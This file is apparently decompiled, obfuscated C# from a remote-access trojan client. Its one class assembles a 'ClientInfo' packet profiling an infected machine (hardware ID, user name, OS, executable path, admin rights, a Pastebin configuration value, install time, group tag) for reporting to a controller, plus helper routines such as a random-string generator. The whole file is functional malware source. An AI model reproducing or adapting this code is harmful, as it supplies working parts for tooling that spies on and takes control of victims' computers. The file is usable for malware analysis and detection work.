using System;
using System.IO;
using System.Windows.Forms;
using Microsoft.VisualBasic.Devices;

// Token: 0x02000009 RID: 9
public static class GClass6
{
	// Token: 0x060000AA RID: 170 RVA: 0x00003AFC File Offset: 0x00001CFC
	public static byte[] smethod_0()
	{
		GClass17 gclass = new GClass17();
		gclass.method_21("Packet").String_0 = "ClientInfo";
		gclass.method_21("HWID").String_0 = GClass1.string_13;
		gclass.method_21("User").String_0 = GClass6.smethod_4(GClass6.smethod_3());
		gclass.method_21("OS").String_0 = GClass6.smethod_7(GClass6.smethod_4(GClass6.smethod_6(GClass6.smethod_5())), "Microsoft", null) + " " + GClass6.smethod_8().ToString().Replace("True", "64bit")
			.Replace("False", "32bit");
		gclass.method_21("Path").String_0 = Application.ExecutablePath;
		gclass.method_21("Version").String_0 = GClass1.string_2;
		gclass.method_21("Admin").String_0 = GClass7.smethod_0().ToString().ToLower()
			.Replace("true", "Admin")
			.Replace("false", "User");
		gclass.method_21("Pastebin").String_0 = GClass1.string_11;
		gclass.method_21("Installed").String_0 = new FileInfo(Application.ExecutablePath).LastWriteTime.ToUniversalTime().ToString();
		gclass.method_21("Pong").String_0 = "";
		gclass.method_21("Group").String_0 = GClass1.string_15;
		return gclass.method_31();
	}

	// Token: 0x060000AB RID: 171 RVA: 0x00003C90 File Offset: 0x00001E90
	public static string smethod_1(int int_0)
	{
		string text = "abcde12345XYZ";
		Random random = GClass6.smethod_9();
		char[] array = new char[int_0];
		for (int i = 0; i < int_0; i++)
		{
			array[i] = GClass6.smethod_12(text, GClass6.smethod_11(random, GClass6.smethod_10(text)));
		}
		return GClass6.smethod_13(array);
	}

	// Token: 0x060000AC RID: 172 RVA: 0x00003CD8 File Offset: 0x00001ED8
	public static bool smethod_2()
	{
		return DateTime.Now.DayOfWeek == DayOfWeek.Sunday;
	}

	// Token: 0x060000AD RID: 173 RVA: 0x00002496 File Offset: 0x00000696
	static string smethod_3()
	{
		return Environment.UserName;
	}

	// Token: 0x060000AE RID: 174 RVA: 0x000022A1 File Offset: 0x000004A1
	static string smethod_4(object object_0)
	{
		return object_0.ToString();
	}

	// Token: 0x060000AF RID: 175 RVA: 0x000024F0 File Offset: 0x000006F0
	static ComputerInfo smethod_5()
	{
		return new ComputerInfo();
	}

	// Token: 0x060000B0 RID: 176 RVA: 0x000024F7 File Offset: 0x000006F7
	static string smethod_6(ComputerInfo computerInfo_0)
	{
		return computerInfo_0.OSFullName;
	}

	// Token: 0x060000B1 RID: 177 RVA: 0x000024FF File Offset: 0x000006FF
	static string smethod_7(string string_1, string string_2, string string_3)
	{
		return string_1.Replace(string_2, string_3);
	}

	// Token: 0x060000B2 RID: 178 RVA: 0x00002509 File Offset: 0x00000709
	static bool smethod_8()
	{
		return Environment.Is64BitOperatingSystem;
	}

	// Token: 0x060000B3 RID: 179 RVA: 0x00002390 File Offset: 0x00000590
	static Random smethod_9()
	{
		return new Random();
	}

	// Token: 0x060000B4 RID: 180 RVA: 0x00002510 File Offset: 0x00000710
	static int smethod_10(string string_1)
	{
		return string_1.Length;
	}

	// Token: 0x060000B5 RID: 181 RVA: 0x00002518 File Offset: 0x00000718
	static int smethod_11(Random random_0, int int_0)
	{
		return random_0.Next(int_0);
	}

	// Token: 0x060000B6 RID: 182 RVA: 0x00002521 File Offset: 0x00000721
	static char smethod_12(string string_1, int int_0)
	{
		return string_1[int_0];
	}

	// Token: 0x060000B7 RID: 183 RVA: 0x0000252A File Offset: 0x0000072A
	static string smethod_13(char[] char_0)
	{
		return new string(char_0);
	}

	// Token: 0x04000027 RID: 39
	public static string string_0;
}
